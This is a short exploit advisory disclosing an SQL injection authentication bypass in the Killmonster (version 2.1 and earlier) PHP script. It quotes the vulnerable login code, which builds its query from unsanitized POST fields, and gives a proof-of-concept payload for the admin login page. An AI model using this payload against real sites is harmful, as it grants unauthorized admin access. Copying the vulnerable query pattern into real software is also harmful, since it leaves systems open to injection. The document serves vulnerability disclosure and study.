[+] Killmonster <= 2.1 (Auth Bypass) SQL Injection Vulnerability [+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org> [+] Download : http://scripts.ringsworld.com/games-and-entertainment/km2/ [+] Vuln Code : [login.php] <form method="POST" action="authenticate.php"> Type Username Here: <input type="text" name="isadmin" size="15"><br> Type Password Here: <input type="password" name="password" size="15" mask="x"><br> <input type="submit" value="submit" name="submit"> [authenticate.php] $isadmin=$_POST['isadmin']; $password=$_POST['password']; $password=md5($password); $query = "select * from km_admins where username='$isadmin' and password='$password'"; $result = mysql_query($query) ; [+] PoC : [Killmonster_path]/admin/login.php username :' or' 1=1 password :' or' 1=1
体验盒子